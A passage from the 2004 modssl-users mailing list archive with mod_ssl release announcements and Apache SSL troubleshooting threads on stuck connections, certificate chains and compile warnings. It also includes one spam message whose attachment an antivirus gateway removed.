      that a correct cipher suite has been negotiated afterwards
      (CAN-2004-0885).

   *) Fixed more printf(3) style format string bugs (not security
      related) which could crash the server if mod_ssl's trace
      or debug log level is enabled.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 22 08:42:12 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7735DA8961; Fri, 22 Oct 2004 08:42:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailserver.kippdata.de (hoech.kippdata.de [195.227.118.3])
	by master.modssl.org (Postfix) with ESMTP id E2120A893D
	for ; Fri, 22 Oct 2004 08:42:07 +0200 (CEST)
Received: from [195.227.30.156] (sorbus.kippdata.de [195.227.30.156])
	by mailserver.kippdata.de (8.12.10/8.12.10) with ESMTP id i9M6fo01006981
	for ; Fri, 22 Oct 2004 08:41:51 +0200 (MEST)
Message-ID: <4178ABA7.4020704@kippdata.de>
Date: Fri, 22 Oct 2004 08:41:43 +0200
From: Bernd Steinert 
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.3) Gecko/20040914
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Schedule for mod_ssl  2.8.20-1.3.32?
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bernd Steinert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Is there a release date for mod_ssl for Apache 1.3.32, already?

Thanks!

Yours

    Bernd Steinert
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 22 14:24:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E3695A8943; Fri, 22 Oct 2004 14:24:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sindel.bascom.com (sindel.bascom.com [69.18.148.68])
	by master.modssl.org (Postfix) with ESMTP id 359EEA893B
	for ; Fri, 22 Oct 2004 14:23:59 +0200 (CEST)
Received: (from root@localhost)
	by sindel.bascom.com (8.12.10/8.12.10/SuSE Linux 0.7) id i9MCO2sD029540
	for modssl-users@modssl.org; Fri, 22 Oct 2004 08:24:02 -0400
Received: from dcomoxp (sandstorm-red.bascom.com [69.18.165.2])
	by sindel.bascom.com (8.12.10/8.12.10/SuSE Linux 0.7) with ESMTP id i9MCNgtl029200
	for ; Fri, 22 Oct 2004 08:23:50 -0400
From: "Drew J. Como" 
To: 
Subject: RE: Schedule for mod_ssl  2.8.20-1.3.32?
Date: Fri, 22 Oct 2004 08:24:32 -0400
Message-ID: <001b01c4b832$188c4ce0$19013c0a@dcomoxp>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.6626
In-Reply-To: <4178ABA7.4020704@kippdata.de>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
X-Spam-Checker-Version: SpamAssassin 2.64 (2004-01-11) on sindel.bascom.com
X-Spam-Level: 
X-Spam-Status: No, hits=0.0 required=7.0 tests=none autolearn=no version=2.64
X-scanner: scanned by Inflex 1.0.12.2 - (http://pldaniels.com/inflex/)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Bernd,

It appears that the updated package is already released.
>From what I can tell, it has been up for a few hours
now.

http://www.modssl.org/source/mod_ssl-2.8.21-1.3.32.tar.gz

Cheers!

============================================
Drew J. Como             Phone: 631-434-6600
Systems Administrator      Fax: 631-434-7800
dcomo@bascom.com         Web: www.bascom.com
    BASCOM Global Internet Services, Inc.
--------------------------------------------
          "When quality is the goal, 
           winning is guaranteed." 

-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Bernd Steinert
Sent: Friday, October 22, 2004 2:42 AM
To: modssl-users@modssl.org
Subject: Schedule for mod_ssl 2.8.20-1.3.32?


Is there a release date for mod_ssl for Apache 1.3.32, already?

Thanks!

Yours

    Bernd Steinert
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 22 15:28:58 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7B7F8A8CD1; Fri, 22 Oct 2004 15:28:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP id EF6ADA8940;
	Fri, 22 Oct 2004 15:28:57 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DBC3C4CE5DB; Fri, 22 Oct 2004 15:28:57 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 0AB8EA17A1; Fri, 22 Oct 2004 15:28:47 +0200 (CEST)
Date: Fri, 22 Oct 2004 15:28:47 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.21 for Apache 1.3.32
Message-ID: <20041022132846.GA29875@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Apache 1.3.32 was released. Although mod_ssl 2.8.20-1.3.31 both applies
and works fine with Apache 1.3.32 I've upgraded mod_ssl to this new
Apache version and released the results as mod_ssl 2.8.21-1.3.32.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 27 19:04:29 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0C7CBA8A49; Wed, 27 Oct 2004 19:04:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx2.svale.netledger.com (mx2.netledger.com [63.209.28.71])
	by master.modssl.org (Postfix) with ESMTP id 551AEA8961
	for ; Wed, 27 Oct 2004 19:04:22 +0200 (CEST)
Received: from corpmail.corp.netledger.com (corpmail.corp.netledger.com [172.16.31.70])
	by mx2.svale.netledger.com (8.11.6/8.11.6) with ESMTP id i9RH4JB13452
	for ; Wed, 27 Oct 2004 10:04:20 -0700
Received: from [172.16.0.11] ([172.16.0.11]) by corpmail.corp.netledger.com with Microsoft SMTPSVC(5.0.2195.6713);
	 Wed, 27 Oct 2004 10:04:13 -0700
Message-ID: <417FD50C.5000508@netsuite.com>
Date: Wed, 27 Oct 2004 11:04:12 -0600
From: Ted Rice 
User-Agent: Mozilla Thunderbird 0.8 (X11/20040913)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: TCP Connections Stuck in "Reading" State
X-Enigmail-Version: 0.86.1.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 27 Oct 2004 17:04:13.0968 (UTC) FILETIME=[FC4A5900:01C4BC46]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ted Rice 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello all,

I've been looking at an issue now for 3 days, and after
extensively reading the mailing list and docuementation, i
am unable to find a solution for my problem.

Frist, i am running Apache 1.3.28 and mod_ssl 2.8.15/openssl 0.9.7d.

The behavior i see is that during the course of normal SSL traffic
(handshakes, data transfer, closing connection) a client will sometimes
spawn between 100 and 500 TCP connections to Apache that remain
in the "Reading" state and occupy client slots until the Apache Timeout
of 1200 seconds kicks in and removes them.

For a few of the offending IP Addresses, i have used tcpdump/ssldump
to capture the TCP traffic inside of the firewall and on the Apache machine.

What i see, is as follows:

1. Normal TCP Connection
2. Followed by Handshake and Cipher Exchange
3. Application Data Flowing
4. TCP connection closed.

However, in certain cases after application data is exchanged, i will
see a flood of TCP connections that are followed by RST(s). Here is a snippet
from the TCPDUMP/SSLDUMP.

     ---------------------------------------------------------------
361 14 24.8021 (0.0000)  S>CV3.0(21)  application_data
     ---------------------------------------------------------------
     ---------------------------------------------------------------
361 15 24.9503 (0.1481)  C>SV3.0(977)  application_data
     ---------------------------------------------------------------
361    24.9521 (0.0017)  C>S  TCP RST
New TCP connection #397: REMOTE_HOST(2683) <-> APACHE_HOST(443)
397    0.1080 (0.1080)  C>S  TCP RST
New TCP connection #398: REMOTE_HOST(2684) <-> APACHE_HOST(443)
398    0.1103 (0.1103)  C>S  TCP RST
New TCP connection #399: REMOTE_HOST(2685) <-> APACHE_HOST(443)
399    0.1126 (0.1126)  C>S  TCP RST
New TCP connection #400: REMOTE_HOST(2686) <-> APACHE_HOST(443)
400    0.1147 (0.1147)  C>S  TCP RST
New TCP connection #401: REMOTE_HOST(2687) <-> APACHE_HOST(443)
401    0.1170 (0.1170)  C>S  TCP RST
New TCP connection #402: REMOTE_HOST(2688) <-> APACHE_HOST(443)
402    0.1193 (0.1193)  C>S  TCP RST
New TCP connection #403: REMOTE_HOST(2689) <-> APACHE_HOST(443)
403    0.1214 (0.1214)  C>S  TCP RST
New TCP connection #404: REMOTE_HOST(2690) <-> APACHE_HOST(443)
404    0.1237 (0.1237)  C>S  TCP RST
New TCP connection #405: REMOTE_HOST(2691) <-> APACHE_HOST(443)
405    0.1259 (0.1259)  C>S  TCP RST
New TCP connection #406: REMOTE_HOST(2692) <-> APACHE_HOST(443)
406    0.1279 (0.1279)  C>S  TCP RST
New TCP connection #407: REMOTE_HOST(2693) <-> APACHE_HOST(443)
407    0.1300 (0.1300)  C>S  TCP RST
...
<>
...
New TCP connection #580: REMOTE_HOST(2883) <-> APACHE_HOST(443)
580 1  0.0673 (0.0673)  C>SV3.0(97)  Handshake
       ClientHello
         Version 3.0


Additionally, i turned on SSL Debugging at the Apache layer, and this
is the only real relevant information i obtained:

[26/Oct/2004 07:54:24 07446] [info]  Connection to child 17 established (server VIRTUAL_HOST:443, client REMOTE_IP)
[26/Oct/2004 07:54:24 07446] [info]  Seeding PRNG with 1160 bytes of entropy
[26/Oct/2004 07:54:24 07446] [trace] OpenSSL: Handshake: start
[26/Oct/2004 07:54:24 07446] [trace] OpenSSL: Loop: before/accept initialization
[26/Oct/2004 08:14:26 07446] [debug] OpenSSL: I/O error, 11 bytes expected to read on BIO#082BE820 [mem: 083D2128]
[26/Oct/2004 08:14:26 07446] [trace] OpenSSL: Exit: error in SSLv2/v3 read client hello A
[26/Oct/2004 08:14:26 07446] [error] SSL handshake timed out (client REMOTE_UP, server VIRTUAL_HOST:443)

Notice above that the point at which the SSL hanshake timed out was at the Apache Timeout of 1200 seconds.
During this period, the request is occupying a client slot in the Reading state.

I would appreciate any help/suggestions, as i am nearly out of idea.

If you reply, please CC trice@netsuite.com as i am currently
not on the modssl-users mailing list.

thanks,

ted rice

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 28 18:43:01 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8D3C0A8976; Thu, 28 Oct 2004 18:43:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wproxy.gmail.com (wproxy.gmail.com [64.233.184.202])
	by master.modssl.org (Postfix) with ESMTP id BC041A893B
	for ; Thu, 28 Oct 2004 18:42:56 +0200 (CEST)
Received: by wproxy.gmail.com with SMTP id 65so537701wri
        for ; Thu, 28 Oct 2004 09:42:53 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding;
        b=jwCz/qVZsuXxh4vpwLAuG/wgmkim0gfbGf6WTL1roEqRKaEE7sEkeqA6X8sfassVVxq41CJAKt800EjlUM0mao8WmsHEzpyAXWMxWEZA2X5WEY1Z1vor2AfDgO5/rn70jGAOqFcIKHNii76YxehIM41WFzLRskmlenqNBOfD8os=
Received: by 10.38.67.25 with SMTP id p25mr1459111rna;
        Thu, 28 Oct 2004 09:42:53 -0700 (PDT)
Received: by 10.38.149.29 with HTTP; Thu, 28 Oct 2004 09:42:53 -0700 (PDT)
Message-ID: <6176123d0410280942301e1ee6@mail.gmail.com>
Date: Thu, 28 Oct 2004 09:42:53 -0700
From: Tim Howell 
To: modssl-users@modssl.org
Subject: mod_ssl and MacOS browsers...
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tim Howell 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've just installed a VeriSign 128 bit certificate on a server running
Apache 2.0.50 with mod_ssl.  Connecting to the server over https works
fine from all of the Windows clients I've tried (Win2K using both IE 6
and Firefox 1.0PR).  However, whenever I try to connect from a MacOS
client (using MSIE 5.1, current Safari, or Firefox 1.0PR) I get a
warning that the certificate issuer is unknown.

Any ideas?  This is for a system that is (hopefully) going into
production in a couple of days.  =)  I've searched the list archives
to no avail.

Thanks!  =)

--TWH
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 28 19:18:06 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2AB14A8CCE; Thu, 28 Oct 2004 19:18:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wproxy.gmail.com (wproxy.gmail.com [64.233.184.196])
	by master.modssl.org (Postfix) with ESMTP id E6F72A8A49
	for ; Thu, 28 Oct 2004 19:18:00 +0200 (CEST)
Received: by wproxy.gmail.com with SMTP id 65so543155wri
        for ; Thu, 28 Oct 2004 10:17:54 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:references;
        b=sx6+8GF4gDfWRIHR943Aa7iTW7dPOv77gfmiGcp5z+PXWfdumtGbAQfmmGjlZgf5j4Q7lCluFLuCeEN1Gxp7dai+H9aq71ypcHksbk9LNoGL3MSqMTC9r85Vxd96x74gWN3PQ7vdu2TxrJOjY6JiqZpY9K/fYHbKR1T38wJvmUw=
Received: by 10.38.81.16 with SMTP id e16mr1470133rnb;
        Thu, 28 Oct 2004 10:17:54 -0700 (PDT)
Received: by 10.38.149.29 with HTTP; Thu, 28 Oct 2004 10:17:54 -0700 (PDT)
Message-ID: <6176123d04102810173903b48b@mail.gmail.com>
Date: Thu, 28 Oct 2004 10:17:54 -0700
From: Tim Howell 
To: modssl-users@modssl.org
Subject: Re: mod_ssl and MacOS browsers...
In-Reply-To: <6176123d0410280942301e1ee6@mail.gmail.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
References: <6176123d0410280942301e1ee6@mail.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tim Howell 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 28 Oct 2004 09:42:53 -0700, Tim Howell
 wrote:
> I've just installed a VeriSign 128 bit certificate on a server running
> Apache 2.0.50 with mod_ssl.  Connecting to the server over https works
> fine from all of the Windows clients I've tried (Win2K using both IE 6
> and Firefox 1.0PR).  However, whenever I try to connect from a MacOS
> client (using MSIE 5.1, current Safari, or Firefox 1.0PR) I get a
> warning that the certificate issuer is unknown.
> 
> Any ideas?  This is for a system that is (hopefully) going into
> production in a couple of days.  =)  I've searched the list archives
> to no avail.
> 
> Thanks!  =)
> 
> --TWH

I think I've solved my own problem.  The solution might be useful for
the archives.

I had to download an intermediary CA certificate from the VeriSign
website and install that using the SSLCertificateChainFile option.

--TWH
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 29 10:21:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BA18AA8961; Fri, 29 Oct 2004 10:21:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from PC276.net (mtorres-ic60731-pamp.red.retevision.es [62.81.72.58])
	by master.modssl.org (Postfix) with SMTP id D9F4EA893B
	for ; Fri, 29 Oct 2004 10:21:00 +0200 (CEST)
Date: Fri, 29 Oct 2004 10:19:54 +0100
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Hello
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------evcgzdoxxwkmldbdtbnu"
X-PAA-AntiVirus: Passed
X-PAA-AntiVirus-Message: Scanned by http://www.pandasoftware.com/PAA
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------evcgzdoxxwkmldbdtbnu
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


:))





----------evcgzdoxxwkmldbdtbnu
Content-Type: text/plain; charset="us-ascii"; format=flowed


**********************************************************
**********************************************************

WARNING: Panda Antivirus GateDefender has detected a prohibited file type
attached to this e-mail message!

The attachment has been automatically removed to
protect your network.

Panda Antivirus GateDefender Administrator: gatedefender@mtorres.es

10/29/04 10:17:25 
Panda Antivirus GateDefender (Version 5.1 R1f (5.0.64.12)) - http://www.pandasoftware.com/
Machine name: PandaAppliance
Machine IP address: 172.16.1.1
Server: 195.27.176.156
Client: 172.16.32.21
Protocol: SMTP

Attachment: Price.scr

**********************************************************
**********************************************************


----------evcgzdoxxwkmldbdtbnu--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 30 15:59:20 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D1905A8A79; Sat, 30 Oct 2004 15:59:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP id DFF67A8976;
	Sat, 30 Oct 2004 15:59:18 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id BCDFB4CE5C5; Sat, 30 Oct 2004 15:59:18 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4F370A17F2; Sat, 30 Oct 2004 15:59:10 +0200 (CEST)
Date: Sat, 30 Oct 2004 15:59:10 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.22 for Apache 1.3.33
Message-ID: <20041030135910.GA39385@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Apache 1.3.32's mod_ssl 2.8.21 still works fine for Apache 1.3.33.
Nevertheless I've rolled a new patch-adjusted version mod_ssl 2.8.22
which fits 1:1 for Apache 1.3.33.
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov  1 20:40:22 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5787EA8CCD; Mon,  1 Nov 2004 20:40:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from c60.cesmail.net (c60.cesmail.net [216.154.195.49])
	by master.modssl.org (Postfix) with ESMTP id 76469A8A7F
	for ; Mon,  1 Nov 2004 20:40:21 +0100 (CET)
Received: from unknown (HELO delta.cesmail.net) (192.168.1.30)
  by c60.cesmail.net with SMTP; 01 Nov 2004 14:40:18 -0500
Received: (qmail 17436 invoked by uid 99); 1 Nov 2004 19:40:18 -0000
Received: from goopot.demon.co.uk (goopot.demon.co.uk [62.49.29.213]) by
	webmail.spamcop.net (Horde) with HTTP for ;
	Mon,  1 Nov 2004 19:40:18 +0000
Message-ID: <20041101194018.sgscs4owookskww0@webmail.spamcop.net>
Date: Mon,  1 Nov 2004 19:40:18 +0000
From: d.j.potts@bcs.org.uk
To: modssl-users@modssl.org
Subject: Apache/mod_ssl/IE problem
MIME-Version: 1.0
Content-Type: text/plain; charset="ISO-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
User-Agent: Internet Messaging Program (IMP) 4.0-cvs
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: d.j.potts@bcs.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

We have a problem with apache with the following symptoms

- the number of apache processes hits MaxClients
- the CPU on the box isn't doing much when we hit the max number of apache
processes
- sometimes apache recovers after about 5 minutes and we reduce to a more
typical number of processes
- other times apache has totally locked up an required a restart

We see no pattern as to when this is occuring. It has occurred during quiet
periods and during periods of heavy load.

We have upped the MaxClients to 256, but we hit that level too.

All our users connect over SSL.

We have seen the following articles on the Microsoft site that makes us think
that this could because of broken version of IE in our user community. However,
we don't know from the articles the exact combination of OS and IE that would
cause the problems and therefore haven't been able to recreate in a test
environment.

http://support.microsoft.com/default.aspx?kbid=305217
http://www.microsoft.com/technet/security/bulletin/MS04-004.mspx


We also get the following error in the SSL error log:

[Tue Oct 26 06:43:04 2004] [error] mod_ssl: SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)
[Tue Oct 26 06:43:04 2004] [error] System: Connection timed out (errno: 145)

We see this quite a lot during normal operation. However, during the periods
were we hit the MaxClient processes, we see the number of these errors increase
by an order of magnitude.

Has anyone else seen similar problems and if so, what was their solution? If
this is the problem described on the MS site, what version of Windows and IE do
we need to recreate? Are there any server side only solutions?

We are running on Solaris with apache 1.2.26 and mod_ssl 2.8.10 using a Sun
Crypto 1 SSL accelerator card.

Any help greatly apprecicated.

Cheers,

Dave.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  2 09:18:33 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C8B9FA8A69; Tue,  2 Nov 2004 09:18:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from degas.physik3.gwdg.de (degas.physik3.gwdg.de [134.76.92.128])
	by master.modssl.org (Postfix) with ESMTP id E34C1A893B
	for ; Tue,  2 Nov 2004 09:18:32 +0100 (CET)
Received: from r2d2.physik3.gwdg.de (r2d2 [134.76.92.64])
	by degas.physik3.gwdg.de (8.11.7p1+Sun/8.11.7) with ESMTP id iA28IT728905
	for ; Tue, 2 Nov 2004 09:18:29 +0100 (MET)
Received: (from strube@localhost)
	by r2d2.physik3.gwdg.de (8.9.3+Sun/8.9.3) id JAA15890
	for modssl-users@modssl.org; Tue, 2 Nov 2004 09:18:29 +0100 (MET)
Date: Tue, 2 Nov 2004 09:18:29 +0100 (MET)
From: Hans Werner Strube 
Message-Id: <200411020818.JAA15890@r2d2.physik3.gwdg.de>
To: modssl-users@modssl.org
Subject: macro redefined: OPENSSL_free
X-Sun-Charset: US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Hans Werner Strube 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

When compiling modssl (at least 2.8.17 to 2.8.22, have overlooked this
earlier), there are many warnings:
"./ssl_util_ssl.h", line 90: warning: macro redefined: OPENSSL_free
My openssl version is 0.9.6m (the latest 0.9.6 release), defining
in opensslv.h and crypto.h, respectively:
#define OPENSSL_VERSION_NUMBER 0x009060dfL
#define OPENSSL_free(addr) CRYPTO_free(addr)

Thus, since 0x009060df < 0x00906100, modssl uses free() instead of
CRYPTO_free(). Is this really intended?
Otherwise the SSL_LIBRARY_VERSION test in ssl_util_ssl.h, line 89, should
use a smaller number than 0x00906100. AfaIk the macro OPENSSL_free was
already introduced on the transition from 0.9.5 to 0.9.6.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov  3 11:38:18 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D40DEA8A65; Wed,  3 Nov 2004 11:38:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web60709.mail.yahoo.com (web60709.mail.yahoo.com [216.109.117.232])
	by master.modssl.org (Postfix) with SMTP id D82EBA893B
	for ; Wed,  3 Nov 2004 11:38:12 +0100 (CET)
Message-ID: <20041103103806.52230.qmail@web60709.mail.yahoo.com>
Received: from [62.129.121.32] by web60709.mail.yahoo.com via HTTP; Wed, 03 Nov 2004 02:38:06 PST
Date: Wed, 3 Nov 2004 02:38:06 -0800 (PST)
From: Matt Stevenson 
Subject: Re: Apache/mod_ssl/IE problem
To: modssl-users@modssl.org
In-Reply-To: <20041101194018.sgscs4owookskww0@webmail.spamcop.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've also seen this problem. Haven't had the time to
find a "proper" solution. However I lowered the server
timeout to around 15 seconds, not ideal but keeps the
site going.

Hopefully someone has a better solution.

Regards
Matt

--- d.j.potts@bcs.org.uk wrote:

> Hello,
> 
> We have a problem with apache with the following
> symptoms
> 
> - the number of apache processes hits MaxClients
> - the CPU on the box isn't doing much when we hit
> the max number of apache
> processes
> - sometimes apache recovers after about 5 minutes
> and we reduce to a more
> typical number of processes
> - other times apache has totally locked up an
> required a restart
> 
> We see no pattern as to when this is occuring. It
> has occurred during quiet
> periods and during periods of heavy load.
> 
> We have upped the MaxClients to 256, but we hit that
> level too.
> 
> All our users connect over SSL.
> 
> We have seen the following articles on the Microsoft
> site that makes us think
> that this could because of broken version of IE in
> our user community. However,
> we don't know from the articles the exact
